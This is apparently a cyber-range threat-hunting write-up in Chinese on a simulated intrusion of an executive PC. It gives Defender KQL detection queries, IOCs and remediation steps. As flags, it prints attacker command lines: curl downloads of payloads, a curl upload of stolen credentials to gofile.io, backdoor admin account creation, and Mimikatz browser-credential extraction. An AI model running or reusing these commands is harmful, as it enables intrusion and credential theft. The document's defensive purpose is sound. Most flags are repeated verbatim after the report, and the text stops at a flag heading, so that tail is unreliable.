nadeznamorris/Threat-Hunting-Scenario-Bridge-Takeover
GitHub: nadeznamorris/Threat-Hunting-Scenario-Bridge-Takeover
一个基于 Microsoft Defender KQL 查询的威胁狩猎实战场景项目,引导安全分析师逐步追踪从横向移动到数据渗漏的完整入侵链。
Stars: 0 | Forks: 0
# 威胁狩猎场景:桥接接管:Azuki 泄露事件
## RDP 入侵事件
**报告 ID:** INC-2025-0612
**分析师:** Nadezna Morris
**日期:** 2025年12月16日
**事件发生日期:** 2025年11月24日
## 执行摘要
在初始文件服务器被攻破五天后,威胁行为者再次出现并显著升级了入侵行为 —— 从之前被攻破的工作站跳板至 CEO 的行政 PC,部署了 Meterpreter 后门,创建了一个隐藏的管理员账户以实现持久化,并窃取了凭证数据库和浏览器密码。攻击者将敏感财务数据暂存到 **8 个受密码保护的压缩包** 中,并将其连同凭证压缩包一起渗漏至匿名文件共享服务 **gofile.io**。这标志着一次严重的攻击升级,需要立即进行遏制、重置凭证并进行全面的取证审查。
## 1. 调查发现
### **关键入侵指标 (IOC):**
| 指标 | 描述 |
| -------------------------------------------------------------------- | -----------------------------|
| 10.1.0.204 | 横向移动源主机 |
| yuki.tanaka | 被攻破的账户 |
| yuki.tanaka2 | 恶意持久化账户 |
| azuki-adminpc | 目标主机 |
| litter.catbox.moe | C2 域名 |
| 45.112.123.227 | C2 / 渗漏 IP |
| meterpreter.exe | 植入物 |
| \Device\NamedPipe\msf-pipe-5902 | 命名管道 (C2) |
| C:\ProgramData\Microsoft\Crypto\staging | 暂存目录 |
| credentials.tar.gz | 渗漏压缩包 (凭证) |
| gofile.io (store1.gofile.io) | 渗漏目的地 |
| m.exe (基于 Mimikatz) | 凭证转储工具 |
| OLD-Passwords.txt, KeePass-Master-Password.txt | 被访问的敏感文件 |
| 7z.exe, curl.exe, robocopy.exe, qwinsta.exe, nltest.exe, netstat.exe | 被滥用的工具 |
***FLAG 1: 横向移动 - 源系统***
**目标:** 攻击者从最初被攻破的系统跳板至高价值目标。识别横向移动的源头可以揭示攻击的进展,并帮助确定完整的入侵范围。
**Flag:** `10.1.0.204`
```
DeviceLogonEvents
| where DeviceName has_any ("azuki")
| where TimeGenerated between (datetime(2025-11-24) .. datetime(2025-12-14))
| where LogonType == "RemoteInteractive"
| project TimeGenerated, DeviceName, AccountName, ActionType, LogonType, RemoteIP
| order by TimeGenerated asc
```
***FLAG 2: 横向移动 - 被攻破的凭证***
**目标:** 了解攻击者用于横向移动的账户可以确定影响范围,并指导凭证重置的优先级。
**Flag:** `yuki.tanaka`
```
DeviceLogonEvents
| where DeviceName has_any ("azuki")
| where TimeGenerated between (datetime(2025-11-24) .. datetime(2025-12-14))
| where LogonType == "RemoteInteractive"
| where RemoteIP == "10.1.0.204"
| project TimeGenerated, DeviceName, AccountName, ActionType, LogonType, RemoteIP
| order by TimeGenerated asc
```
***FLAG 3: 横向移动 - 目标设备***
**目标:** 攻击者根据用户角色和数据访问权限选择高价值目标。识别被攻破的设备可以揭示哪些信息面临风险。
**Flag:** `azuki-adminpc`
```
DeviceLogonEvents
| where DeviceName has_any ("azuki")
| where TimeGenerated between (datetime(2025-11-24) .. datetime(2025-12-14))
| where LogonType == "RemoteInteractive"
| where RemoteIP == "10.1.0.204"
| project TimeGenerated, DeviceName, AccountName, ActionType, LogonType, RemoteIP
| order by TimeGenerated asc
```
***FLAG 4: 执行 - 载荷托管服务***
**目标:** 攻击者在不同操作之间轮换基础设施,以规避网络封锁和威胁情报源。记录新域名对于防御至关重要。
**Flag:** `litter.catbox.moe`
```
DeviceNetworkEvents
| where DeviceName == "azuki-adminpc"
| where TimeGenerated between (datetime(2025-11-24) .. datetime(2025-12-14))
| where ActionType == "ConnectionSuccess"
| where RemoteUrl != ""
| where not(RemoteUrl has_any ("microsoft", "windows", "office", "azure"))
| project TimeGenerated, DeviceName, RemoteUrl, RemoteIP
| order by TimeGenerated asc
```
***FLAG 5: 执行 - 恶意软件下载命令***
**目标:** 命令行下载实用程序提供了灵活、可脚本化的恶意软件投递方式,同时能伪装成合法的管理活动。
**Flag:** `"curl.exe" -L -o C:\Windows\Temp\cache\KB5044273-x64.7z https://litter.catbox.moe/gfdb9v.7z`
```
DeviceProcessEvents
| where DeviceName == "azuki-adminpc"
| where TimeGenerated between (datetime(2025-11-24) .. datetime(2025-12-14))
| where ProcessCommandLine has_any ("curl", "wget", "bitsadmin", "certutil", "Invoke-WebRequest", "iwr")
| project TimeGenerated, DeviceName, FileName, ProcessCommandLine
| order by TimeGenerated asc
```
***FLAG 6: 执行 - 压缩包解压命令***
**目标:** 受密码保护的压缩包可以逃避基础的内容检查,而合法的压缩工具则可以绕过应用程序白名单控制。
**Flag:** `"7z.exe" x C:\Windows\Temp\cache\KB5044273-x64.7z -p******** -oC:\Windows\Temp\cache\ -y`
```
DeviceProcessEvents
| where DeviceName == "azuki-adminpc"
| where TimeGenerated between (datetime(2025-11-24) .. datetime(2025-12-14))
| where FileName has_any ("7z.exe", "7za.exe", "winrar.exe", "rar.exe")
| where ProcessCommandLine has_any (" -p", "-p", "-pass", "-password")
| project TimeGenerated, DeviceName, FileName, ProcessCommandLine
| order by TimeGenerated asc
```
***FLAG 7: 持久化 - C2 植入物***
**目标:** 命令与控制 (C2) 植入物可维持持久访问权限,并实现对被攻陷系统的远程控制。植入物的文件名通常会伪装成合法的进程。
**Flag:** `meterpreter.exe`
```
DeviceFileEvents
| where DeviceName == "azuki-adminpc"
| where TimeGenerated between (datetime(2025-11-24) .. datetime(2025-12-14))
| where ActionType == "FileCreated"
| where FolderPath has_any ("AppData\\Local\\Temp", "Cache", "AppData\\Roaming")
| where FileName endswith ".exe"
| project TimeGenerated, DeviceName, FolderPath, FileName, InitiatingProcessFileName
| order by TimeGenerated asc
```
***FLAG 8: 持久化 - 命名管道***
**目标:** 命名管道为 C2 框架启用了进程间通信。管道遵循独特的命名模式,可作为行为特征指标。
**Flag:** `\Device\NamedPipe\msf-pipe-5902`
```
DeviceEvents
| where DeviceName == "azuki-adminpc"
| where TimeGenerated between (datetime(2025-11-24) .. datetime(2025-12-14))
| where ActionType == "NamedPipeEvent"
| extend PipeName = tostring(parse_json(AdditionalFields).PipeName)
| where InitiatingProcessFileName == "meterpreter.exe"
| project TimeGenerated, DeviceName, PipeName, InitiatingProcessFileName
| order by TimeGenerated asc
```
***FLAG 9: 凭证访问 - 解码后的账户创建命令***
**目标:** Base64 编码将恶意命令混淆,以规避基础的字符串匹配和日志分析。解码后可揭示其真实意图。
**Flag:** `net user yuki.tanaka2 B@ckd00r2024! /add`
```
DeviceProcessEvents
| where DeviceName == "azuki-adminpc"
| where TimeGenerated between (datetime(2025-11-24) .. datetime(2025-12-14))
| where FileName in ("powershell.exe", "pwsh.exe")
| where ProcessCommandLine has_any ("-enc", "-encodedcommand")
| project TimeGenerated, DeviceName, ProcessCommandLine
| order by TimeGenerated asc
```
***FLAG 10: 持久化 - 后门账户***
**目标:** 隐藏的管理员账户在主要的持久化机制被发现并移除时,可提供备用的访问途径。
**Flag:** `yuki.tanaka2`
```
DeviceProcessEvents
| where DeviceName == "azuki-adminpc"
| where TimeGenerated between (datetime(2025-11-24) .. datetime(2025-12-14))
| where FileName in ("powershell.exe", "pwsh.exe")
| where ProcessCommandLine has_any ("-enc", "-encodedcommand")
| project TimeGenerated, DeviceName, ProcessCommandLine
| order by TimeGenerated asc
```
***FLAG 11: 持久化 - 解码后的权限提升命令***
**目标:** Base64 编码将恶意命令混淆,以规避基础的字符串匹配和日志分析。解码后可揭示其真实意图。
**Flag:** `net localgroup Administrators yuki.tanaka2 /add`
```
DeviceProcessEvents
| where DeviceName == "azuki-adminpc"
| where TimeGenerated between (datetime(2025-11-24) .. datetime(2025-12-14))
| where FileName in ("powershell.exe", "pwsh.exe")
| where ProcessCommandLine has_any ("-enc", "-encodedcommand")
| project TimeGenerated, DeviceName, ProcessCommandLine
| order by TimeGenerated asc
```
***FLAG 12: 发现 - 会话枚举***
**目标:** 终端服务枚举会显示活动的用户会话,帮助攻击者识别高价值目标并避免被检测。
**Flag:** `qwinsta.exe`
```
DeviceProcessEvents
| where DeviceName == "azuki-adminpc"
| where TimeGenerated between (datetime(2025-11-24) .. datetime(2025-12-14))
| where ProcessCommandLine has_any ("query user", "quser", "qwinsta", "query session")
| project TimeGenerated, DeviceName, FileName, ProcessCommandLine
| order by TimeGenerated asc
```
***FLAG 13: 发现 - 域信任枚举***
**目标:** 域信任关系揭示了跨组织边界进行横向移动的路径,以及连接林中的潜在目标。
**Flag:** `"nltest.exe" /domain_trusts /all_trusts`
```
DeviceProcessEvents
| where DeviceName == "azuki-adminpc"
| where TimeGenerated between (datetime(2025-11-24) .. datetime(2025-12-14))
| where ProcessCommandLine has_any ("domain")
| project TimeGenerated, DeviceName, AccountName, ProcessCommandLine
| order by TimeGenerated asc
```
***FLAG 14: 发现 - 网络连接枚举***
**目标:** 网络连接枚举可识别活动的会话、监听服务以及潜在的横向移动目标。
**Flag:** `"NETSTAT.EXE" -ano`
```
DeviceProcessEvents
| where DeviceName == "azuki-adminpc"
| where TimeGenerated between (datetime(2025-11-24) .. datetime(2025-12-14))
| where ProcessCommandLine has_any ("NET", "netstat")
| project TimeGenerated, DeviceName, AccountName, ProcessCommandLine
| order by TimeGenerated asc
```
***FLAG 15: 发现 - 密码数据库搜索***
**目标:** 密码管理数据库包含多个系统的凭证,是凭证窃取的高优先级目标。
**Flag:** `"cmd.exe" /c where /r C:\Users *.kdbx`
```
DeviceProcessEvents
| where DeviceName == "azuki-adminpc"
| where TimeGenerated between (datetime(2025-11-24) .. datetime(2025-12-14))
| where ProcessCommandLine has_any ("dir ", "where ", "Get-ChildItem", "gci")
| where ProcessCommandLine has_any (".kdbx", ".kdb", ".psafe3")
| project TimeGenerated, DeviceName, AccountName, ProcessCommandLine
| order by TimeGenerated asc
```
***FLAG 16: 发现 - 凭证文件***
**目标:** 明文密码文件代表了严重的安全漏洞,并为攻击者提供了对多个系统的直接访问权限。
**Flag:** `OLD-Passwords.txt`
```
DeviceProcessEvents
| where DeviceName == "azuki-adminpc"
| where TimeGenerated between (datetime(2025-11-24) .. datetime(2025-12-14))
| where ProcessCommandLine has_any (".txt")
| project TimeGenerated, DeviceName, FileName, ProcessCommandLine
| order by TimeGenerated asc
```
***FLAG 17: 收集 - 数据暂存目录***
**目标:** 攻击者在系统目录中建立暂存位置,以便在渗漏前整理窃取的数据。这些路径是取证调查的关键 IOC。
**Flag:** `C:\ProgramData\Microsoft\Crypto\staging`
```
DeviceFileEvents
| where DeviceName == "azuki-adminpc"
| where TimeGenerated between (datetime(2025-11-24) .. datetime(2025-12-14))
| where ActionType == "FileCreated"
| where FolderPath has_any ("staging")
| project TimeGenerated, DeviceName, ActionType, FolderPath
| order by TimeGenerated desc
```
***FLAG 18: 收集 - 自动化数据收集命令***
**目标:** 具有重试逻辑和网络优化功能的可脚本化文件复制技术,非常适用于批量数据窃取操作。
**Flag:** `"Robocopy.exe" C:\Users\yuki.tanaka\Documents\Banking C:\ProgramData\Microsoft\Crypto\staging\Banking /E /R:1 /W:1 /NP`
```
DeviceProcessEvents
| where DeviceName == "azuki-adminpc"
| where TimeGenerated between (datetime(2025-11-24) .. datetime(2025-12-14))
| where ProcessCommandLine has_any ("/R:", "/W:", "/Z", "/E")
| project TimeGenerated, DeviceName, FileName, ProcessCommandLine
| order by TimeGenerated asc
```
***FLAG 19: 收集 - 渗漏数量***
**目标:** 量化创建的压缩包数量可以揭示数据窃取的范围,并有助于优先安排影响评估工作。
**Flag:** `8`
```
DeviceFileEvents
| where DeviceName == "azuki-adminpc"
| where TimeGenerated between (datetime(2025-11-24) .. datetime(2025-12-14))
| where ActionType == "FileCreated"
| where InitiatingProcessFileName has_any ("7z.exe", "rar.exe", "WinRAR.exe", "tar.exe", "zip.exe")
| where FileName !has "PSScriptPolicyTest_"
| project TimeGenerated, DeviceName, ActionType, FolderPath
| order by TimeGenerated desc
```
***FLAG 20: 凭证访问 - 凭证窃取工具下载***
**目标:** 攻击者将专门的凭证窃取工具直接下载到被攻陷的系统中,根据目标环境调整其工具集。
**Flag:** `"curl.exe" -L -o m-temp.7z https://litter.catbox.moe/mt97cj.7z`
```
DeviceProcessEvents
| where DeviceName == "azuki-adminpc"
| where TimeGenerated between (datetime(2025-11-24) .. datetime(2025-12-14))
| where ProcessCommandLine has_any ("curl", "wget", "certutil", "bitsadmin", "Invoke-WebRequest", "iwr")
| project TimeGenerated, DeviceName, FileName, ProcessCommandLine
| order by TimeGenerated desc
```
***FLAG 21: 凭证访问 - 浏览器凭证窃取***
**目标:** 现代凭证窃取主要针对浏览器密码存储,在不触发针对 LSASS 的检测的情况下提取已保存的凭证。
**Flag:** `"m.exe" privilege::debug "dpapi::chrome /in:%localappdata%\Google\Chrome\User Data\Default\Login Data /unprotect" exit`
```
DeviceProcessEvents
| where DeviceName == "azuki-adminpc"
| where TimeGenerated between (datetime(2025-11-24) .. datetime(2025-12-14))
| where ProcessCommandLine has_any ("mimikatz", "browser", "chrome", "edge", "logins", "theft")
| project TimeGenerated, DeviceName, FileName, ProcessCommandLine
| order by TimeGenerated desc
```
***FLAG 22: 渗漏 - 数据上传命令***
**目标:** 基于表单的 HTTP 上传提供了简单、可靠的数据渗漏方式,能够与合法的 Web 流量融为一体,并支持大文件传输。
**Flag:** `"curl.exe" -X POST -F file=@credentials.tar.gz https://store1.gofile.io/uploadFile`
```
DeviceProcessEvents
| where DeviceName == "azuki-adminpc"
| where TimeGenerated between (datetime(2025-11-24) .. datetime(2025-12-14))
| where ProcessCommandLine has_any ("curl", "Invoke-WebRequest", "iwr", "wget")
| where ProcessCommandLine has_any ("POST", "-F", "--form", "-X POST", "-Method Post")
| project TimeGenerated, DeviceName, FileName, ProcessCommandLine
| order by TimeGenerated desc
```
***FLAG 23: 渗漏 - 云存储服务***
**目标:** 匿名文件共享服务提供了带有阅后即焚链接的临时存储,使数据恢复和溯源变得复杂。
**Flag:** `gofile.io`
```
DeviceProcessEvents
| where DeviceName == "azuki-adminpc"
| where TimeGenerated between (datetime(2025-11-24) .. datetime(2025-12-14))
| where ProcessCommandLine has_any ("credentials.tar.gz")
| project TimeGenerated, DeviceName, FileName, ProcessCommandLine
| order by TimeGenerated desc
```
***FLAG 24: 渗漏 - 目标服务器***
**目标:** 当基于域名的控制失败或被绕过时,IP 地址可用于网络层封锁和威胁情报关联。
**Flag:** `45.112.123.227`
```
DeviceNetworkEvents
| where DeviceName == "azuki-adminpc"
| where TimeGenerated between (datetime(2025-11-24) .. datetime(2025-12-14))
| where ActionType == "ConnectionSuccess"
| where RemoteUrl has_any ("gofile")
| project TimeGenerated, DeviceName, RemoteIP, RemoteUrl
| order by TimeGenerated asc
```
***FLAG 25: 凭证访问 - 主密码提取***
**目标:** 密码管理器存储多个系统的凭证。提取主密码即可获得所有已存储机密的访问权限。
**Flag:** `KeePass-Master-Password.txt`
```
DeviceProcessEvents
| where DeviceName == "azuki-adminpc"
| where TimeGenerated between (datetime(2025-11-24) .. datetime(2025-12-14))
| where ProcessCommandLine has_any (".txt")
| project TimeGenerated, DeviceName, FileName, ProcessCommandLine
| order by TimeGenerated asc
```
## 2. 调查摘要
在初始文件服务器被攻破五天后,威胁行为者重返该环境并显著升级了入侵行为。攻击者使用之前被攻陷的账户 `yuki.tanaka`,从主机 `10.1.0.204` 横向移动到 `azuki-adminpc`(即 CEO 的行政工作站)—— 这是一个能够访问敏感财务和凭证数据的高价值目标。
在新目标上,攻击者部署了 **Meterpreter** 植入物(伪装为 `meterpreter.exe`),通过命名管道 (`msf-pipe-5902`) 进行通信,建立了持久的命令与控制 (C2)。为了在被发现后仍能维持访问权限,他们通过 base64 混淆命令创建了一个隐藏的本地管理员账户 `yuki.tanaka2`。
随后,攻击者进行了广泛的 **侦察**(通过 `qwinsta`、`nltest` 和 `netstat` 进行活动会话、域信任和网络枚举),随后定位并窃取了凭证存储库,包括 KeePass 数据库(`OLD-Passwords.txt`,`KeePass-Master-Password.txt`)以及使用基于 Mimikatz 的工具 (`m.exe`) 提取的 Chrome 浏览器凭证。
敏感文件(包括银行记录)通过 `Roboc` 被暂存到 `C:\ProgramData\Microsoft\Crypto\staging` 中,在那里使用 7-Zip 准备了 **8 个受密码保护的压缩包** 用于渗漏。被盗数据(包括 `credentials.tar.gz`)通过 HTTP POST 被渗漏至匿名文件共享服务 `gofile.io` (store1.gofile.io),其辅助基础设施关联到 IP `45.112.123.227`,并从之前识别的 C2 域名 `litter.catbox.moe` 进行了二次下载。
此次第二阶段的入侵标志着一次重大的升级:从初始的工作站被攻陷,到 CEO 级别的访问权限、部署持久化后门、凭证数据库被窃取,以及确认财务和身份验证数据遭到渗漏 —— 因此必须立即重置凭证、封锁 IOC,并对受影响的系统进行全面的取证审查。
## 3. MITRE ATT&CK 映射
| 战术 | 技术 | 证据 |
| ----------------------------------- | --------------------------------------------------------- | ------------------------------------------------ |
| 初始访问 / 横向移动 | T1078 - 有效账户 | 使用 yuki.tanaka 凭证 |
| 横向移动 | T1021 - 远程服务 | 从 10.1.0.204 跳板至 azuki-adminpc |
| 执行 | T1059 - 命令和脚本解释器 | Base64 编码的 cmd/PowerShell 命令 |
| 防御规避 | T1140 - 去混淆/解码文件或信息 | Base64 编码的账户创建命令 |
| 持久化 | T1136.001 - 创建账户:本地账户 | 创建 yuki.tanaka2 |
| 权限提升 | T1098 - 账户操纵(添加到管理员组) | 将 yuki.tanaka2 添加到管理员组 |
| 命令与控制 | T1071 / T1559 - 应用层协议 / IPC | Meterpreter 命名管道 msf-pipe-5902 |
| 命令与控制 / 资源开发 | T1105 - 入口工具传输 | curl.exe 从 litter.catbox.moe 下载 |
| 发现 | T1087 - 账户发现 | qwinsta.exe 会话枚举 |
| 发现 | T1482 - 域信任发现 | nltest.exe /domain_trusts |
| 发现 | T1049 - 系统网络连接发现 | netstat.exe -ano |
| 发现 | T1083 - 文件和目录发现 | 使用 where /r 搜索 .kdbx 文件 |
| 凭证访问 | T1555 - 来自密码存储的凭证 | KeePass 数据库, OLD-Passwords.txt |
| 凭证访问 | T1003.001 - 操作系统凭证转储 (DPAPI) | m.exe Chrome DPAPI 凭证提取 |
| 收集 | T1074.001 - 数据暂存 | 使用 Robocopy 转移至暂存目录 |
| 收集 | T1560.001 - 压缩收集的数据 | 7z.exe 创建 8 个受密码保护的压缩包 |
| 渗漏 | T1567.002 - 通过 Web 服务渗漏 (云存储) | curl POST 发送至 gofile.io |
## 4. 建议
### 立即行动
- 将 `azuki-adminpc` 和 `10.1.0.204` 从网络中隔离,以便进行取证镜像和分析。
- 强制重置 `yuki.tanaka` 以及所有在浏览器中保存密码或存储在 KeePass 中的账户密码(假设已全部被窃)。
- 识别并禁用/删除恶意的 `yuki.tanaka2` 账户;审核整个环境中所有的本地管理员组成员资格。
- 在防火墙/代理上封锁 C2/渗漏基础设施:`litter.catbox.moe, gofile.io` / `store1.gofile.io` 和 `45.112.123.227`。
- 终止所有正在运行的 `meterpreter.exe` 进程,并在其他主机上搜寻 `msf-pipe-5902` 命名管道模式。
- 在采取补救措施之前,保留易失性证据(内存、网络连接、进程列表)。
### 短期补救
- 在所有主机(尤其是管理员工作站)上进行全环境的 IOC 和 TTP 扫描(相同的压缩工具使用情况、curl 下载、暂存目录、命名管道模式)。
- 轮换存储在被攻陷的 KeePass 数据库中的所有凭证,并审查是否在各个系统中存在重复使用的情况。
- 限制/加白名单,禁止在非管理上下文中执行压缩和下载实用程序 (7z.exe, curl.exe, robocopy.exe)。
- 启用增强日志记录:带有命令行审计的进程创建、PowerShell 脚本块日志记录以及命名管道创建事件。
- 限制或监控发往匿名文件共享/存储服务(gofile.io、catbox.moe 及类似服务)的出站流量。
- 对受影响的终端(azuki-adminpc、最初被攻陷的文件服务器、10.1.0.204)进行重新镜像,而不是仅仅依赖清理操作。
### 长期补救
- 部署/强化 EDR,增加针对“先压缩后渗漏”模式、可疑命名管道和 DPAPI 凭证访问的行为检测。
- 实施特权访问管理 (PAM) 解决方案;移除常驻的本地管理员权限,尤其是在高管/行政工作站上。
- 实施网络分段,将高价值终端(高管 PC、文件服务器)与普通用户网段隔离。
- 强制所有特权账户使用 MFA,并摒弃明文凭证文件,转向带有审计追踪的企业级密码管理方案。
- 部署 DLP 控制措施,以检测批量暂存和压缩/归档数据的出站传输。
- 集成威胁情报源,在无业务访问需求的情况下主动封锁已知的基础设施(例如 catbox.moe、gofile.io 相关模式)。
- 定期开展紫队演练,以验证对本事件中发现的横向移动、持久化和渗漏 TTP 的检测覆盖率。
**报告状态:** 已完成
**下次审查:** 2025年12月23日
**分发范围:** Cyber Range
***FLAG 2: 横向移动 - 被攻破的凭证***
**目标:** 了解攻击者用于横向移动的账户可以确定影响范围,并指导凭证重置的优先级。
**Flag:** `yuki.tanaka`
```
DeviceLogonEvents
| where DeviceName has_any ("azuki")
| where TimeGenerated between (datetime(2025-11-24) .. datetime(2025-12-14))
| where LogonType == "RemoteInteractive"
| where RemoteIP == "10.1.0.204"
| project TimeGenerated, DeviceName, AccountName, ActionType, LogonType, RemoteIP
| order by TimeGenerated asc
```
***FLAG 3: 横向移动 - 目标设备***
**目标:** 攻击者根据用户角色和数据访问权限选择高价值目标。识别被攻破的设备可以揭示哪些信息面临风险。
**Flag:** `azuki-adminpc`
```
DeviceLogonEvents
| where DeviceName has_any ("azuki")
| where TimeGenerated between (datetime(2025-11-24) .. datetime(2025-12-14))
| where LogonType == "RemoteInteractive"
| where RemoteIP == "10.1.0.204"
| project TimeGenerated, DeviceName, AccountName, ActionType, LogonType, RemoteIP
| order by TimeGenerated asc
```
***FLAG 4: 执行 - 载荷托管服务***
**目标:** 攻击者在不同操作之间轮换基础设施,以规避网络封锁和威胁情报源。记录新域名对于防御至关重要。
**Flag:** `litter.catbox.moe`
```
DeviceNetworkEvents
| where DeviceName == "azuki-adminpc"
| where TimeGenerated between (datetime(2025-11-24) .. datetime(2025-12-14))
| where ActionType == "ConnectionSuccess"
| where RemoteUrl != ""
| where not(RemoteUrl has_any ("microsoft", "windows", "office", "azure"))
| project TimeGenerated, DeviceName, RemoteUrl, RemoteIP
| order by TimeGenerated asc
```
***FLAG 5: 执行 - 恶意软件下载命令***
**目标:** 命令行下载实用程序提供了灵活、可脚本化的恶意软件投递方式,同时能伪装成合法的管理活动。
**Flag:** `"curl.exe" -L -o C:\Windows\Temp\cache\KB5044273-x64.7z https://litter.catbox.moe/gfdb9v.7z`
```
DeviceProcessEvents
| where DeviceName == "azuki-adminpc"
| where TimeGenerated between (datetime(2025-11-24) .. datetime(2025-12-14))
| where ProcessCommandLine has_any ("curl", "wget", "bitsadmin", "certutil", "Invoke-WebRequest", "iwr")
| project TimeGenerated, DeviceName, FileName, ProcessCommandLine
| order by TimeGenerated asc
```
***FLAG 6: 执行 - 压缩包解压命令***
**目标:** 受密码保护的压缩包可以逃避基础的内容检查,而合法的压缩工具则可以绕过应用程序白名单控制。
**Flag:** `"7z.exe" x C:\Windows\Temp\cache\KB5044273-x64.7z -p******** -oC:\Windows\Temp\cache\ -y`
```
DeviceProcessEvents
| where DeviceName == "azuki-adminpc"
| where TimeGenerated between (datetime(2025-11-24) .. datetime(2025-12-14))
| where FileName has_any ("7z.exe", "7za.exe", "winrar.exe", "rar.exe")
| where ProcessCommandLine has_any (" -p", "-p", "-pass", "-password")
| project TimeGenerated, DeviceName, FileName, ProcessCommandLine
| order by TimeGenerated asc
```
***FLAG 7: 持久化 - C2 植入物***
**目标:** 命令与控制 (C2) 植入物可维持持久访问权限,并实现对被攻陷系统的远程控制。植入物的文件名通常会伪装成合法的进程。
**Flag:** `meterpreter.exe`
```
DeviceFileEvents
| where DeviceName == "azuki-adminpc"
| where TimeGenerated between (datetime(2025-11-24) .. datetime(2025-12-14))
| where ActionType == "FileCreated"
| where FolderPath has_any ("AppData\\Local\\Temp", "Cache", "AppData\\Roaming")
| where FileName endswith ".exe"
| project TimeGenerated, DeviceName, FolderPath, FileName, InitiatingProcessFileName
| order by TimeGenerated asc
```
***FLAG 8: 持久化 - 命名管道***
**目标:** 命名管道为 C2 框架启用了进程间通信。管道遵循独特的命名模式,可作为行为特征指标。
**Flag:** `\Device\NamedPipe\msf-pipe-5902`
```
DeviceEvents
| where DeviceName == "azuki-adminpc"
| where TimeGenerated between (datetime(2025-11-24) .. datetime(2025-12-14))
| where ActionType == "NamedPipeEvent"
| extend PipeName = tostring(parse_json(AdditionalFields).PipeName)
| where InitiatingProcessFileName == "meterpreter.exe"
| project TimeGenerated, DeviceName, PipeName, InitiatingProcessFileName
| order by TimeGenerated asc
```
***FLAG 9: 凭证访问 - 解码后的账户创建命令***
**目标:** Base64 编码将恶意命令混淆,以规避基础的字符串匹配和日志分析。解码后可揭示其真实意图。
**Flag:** `net user yuki.tanaka2 B@ckd00r2024! /add`
```
DeviceProcessEvents
| where DeviceName == "azuki-adminpc"
| where TimeGenerated between (datetime(2025-11-24) .. datetime(2025-12-14))
| where FileName in ("powershell.exe", "pwsh.exe")
| where ProcessCommandLine has_any ("-enc", "-encodedcommand")
| project TimeGenerated, DeviceName, ProcessCommandLine
| order by TimeGenerated asc
```
***FLAG 10: 持久化 - 后门账户***
**目标:** 隐藏的管理员账户在主要的持久化机制被发现并移除时,可提供备用的访问途径。
**Flag:** `yuki.tanaka2`
```
DeviceProcessEvents
| where DeviceName == "azuki-adminpc"
| where TimeGenerated between (datetime(2025-11-24) .. datetime(2025-12-14))
| where FileName in ("powershell.exe", "pwsh.exe")
| where ProcessCommandLine has_any ("-enc", "-encodedcommand")
| project TimeGenerated, DeviceName, ProcessCommandLine
| order by TimeGenerated asc
```
***FLAG 11: 持久化 - 解码后的权限提升命令***
**目标:** Base64 编码将恶意命令混淆,以规避基础的字符串匹配和日志分析。解码后可揭示其真实意图。
**Flag:** `net localgroup Administrators yuki.tanaka2 /add`
```
DeviceProcessEvents
| where DeviceName == "azuki-adminpc"
| where TimeGenerated between (datetime(2025-11-24) .. datetime(2025-12-14))
| where FileName in ("powershell.exe", "pwsh.exe")
| where ProcessCommandLine has_any ("-enc", "-encodedcommand")
| project TimeGenerated, DeviceName, ProcessCommandLine
| order by TimeGenerated asc
```
***FLAG 12: 发现 - 会话枚举***
**目标:** 终端服务枚举会显示活动的用户会话,帮助攻击者识别高价值目标并避免被检测。
**Flag:** `qwinsta.exe`
```
DeviceProcessEvents
| where DeviceName == "azuki-adminpc"
| where TimeGenerated between (datetime(2025-11-24) .. datetime(2025-12-14))
| where ProcessCommandLine has_any ("query user", "quser", "qwinsta", "query session")
| project TimeGenerated, DeviceName, FileName, ProcessCommandLine
| order by TimeGenerated asc
```
***FLAG 13: 发现 - 域信任枚举***
**目标:** 域信任关系揭示了跨组织边界进行横向移动的路径,以及连接林中的潜在目标。
**Flag:** `"nltest.exe" /domain_trusts /all_trusts`
```
DeviceProcessEvents
| where DeviceName == "azuki-adminpc"
| where TimeGenerated between (datetime(2025-11-24) .. datetime(2025-12-14))
| where ProcessCommandLine has_any ("domain")
| project TimeGenerated, DeviceName, AccountName, ProcessCommandLine
| order by TimeGenerated asc
```
***FLAG 14: 发现 - 网络连接枚举***
**目标:** 网络连接枚举可识别活动的会话、监听服务以及潜在的横向移动目标。
**Flag:** `"NETSTAT.EXE" -ano`
```
DeviceProcessEvents
| where DeviceName == "azuki-adminpc"
| where TimeGenerated between (datetime(2025-11-24) .. datetime(2025-12-14))
| where ProcessCommandLine has_any ("NET", "netstat")
| project TimeGenerated, DeviceName, AccountName, ProcessCommandLine
| order by TimeGenerated asc
```
***FLAG 15: 发现 - 密码数据库搜索***
**目标:** 密码管理数据库包含多个系统的凭证,是凭证窃取的高优先级目标。
**Flag:** `"cmd.exe" /c where /r C:\Users *.kdbx`
```
DeviceProcessEvents
| where DeviceName == "azuki-adminpc"
| where TimeGenerated between (datetime(2025-11-24) .. datetime(2025-12-14))
| where ProcessCommandLine has_any ("dir ", "where ", "Get-ChildItem", "gci")
| where ProcessCommandLine has_any (".kdbx", ".kdb", ".psafe3")
| project TimeGenerated, DeviceName, AccountName, ProcessCommandLine
| order by TimeGenerated asc
```
***FLAG 16: 发现 - 凭证文件***
**目标:** 明文密码文件代表了严重的安全漏洞,并为攻击者提供了对多个系统的直接访问权限。
**Flag:** `OLD-Passwords.txt`
```
DeviceProcessEvents
| where DeviceName == "azuki-adminpc"
| where TimeGenerated between (datetime(2025-11-24) .. datetime(2025-12-14))
| where ProcessCommandLine has_any (".txt")
| project TimeGenerated, DeviceName, FileName, ProcessCommandLine
| order by TimeGenerated asc
```
***FLAG 17: 收集 - 数据暂存目录***
**目标:** 攻击者在系统目录中建立暂存位置,以便在渗漏前整理窃取的数据。这些路径是取证调查的关键 IOC。
**Flag:** `C:\ProgramData\Microsoft\Crypto\staging`
```
DeviceFileEvents
| where DeviceName == "azuki-adminpc"
| where TimeGenerated between (datetime(2025-11-24) .. datetime(2025-12-14))
| where ActionType == "FileCreated"
| where FolderPath has_any ("staging")
| project TimeGenerated, DeviceName, ActionType, FolderPath
| order by TimeGenerated desc
```
***FLAG 18: 收集 - 自动化数据收集命令***
**目标:** 具有重试逻辑和网络优化功能的可脚本化文件复制技术,非常适用于批量数据窃取操作。
**Flag:** `"Robocopy.exe" C:\Users\yuki.tanaka\Documents\Banking C:\ProgramData\Microsoft\Crypto\staging\Banking /E /R:1 /W:1 /NP`
```
DeviceProcessEvents
| where DeviceName == "azuki-adminpc"
| where TimeGenerated between (datetime(2025-11-24) .. datetime(2025-12-14))
| where ProcessCommandLine has_any ("/R:", "/W:", "/Z", "/E")
| project TimeGenerated, DeviceName, FileName, ProcessCommandLine
| order by TimeGenerated asc
```
***FLAG 19: 收集 - 渗漏数量***
